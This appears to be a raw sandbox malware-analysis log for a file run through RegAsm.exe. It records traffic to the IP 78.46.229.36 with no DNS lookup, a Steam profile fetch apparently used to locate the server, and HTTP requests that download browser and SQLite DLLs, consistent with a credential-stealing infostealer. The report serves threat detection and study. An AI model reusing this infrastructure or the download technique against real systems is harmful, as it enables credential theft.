Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown	TCP traffic detected without corresponding DNS query: 78.46.229.36

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00404420

Source: global traffic	HTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: steamcommunity.com

Source: unknown

Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.1982390660.0000000019EED000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://78.46.229.36
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/2
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/B
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/D
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/Hos
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/U&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/d
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/g
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/mozglue.dll2E
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/msvcp140.dllnE
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/msvcp140.dllxE
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nes
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nss3.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nss3.dllr#4
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/p&
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/ramData
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/softokn3.dllBE
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/sqlm.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/~&
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36HIJKF
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36IDGIE
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36JEBKE
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHl
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=kMVE
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=swtsTjCD0CFZ&amp
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=n5zImpoIZ8N
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
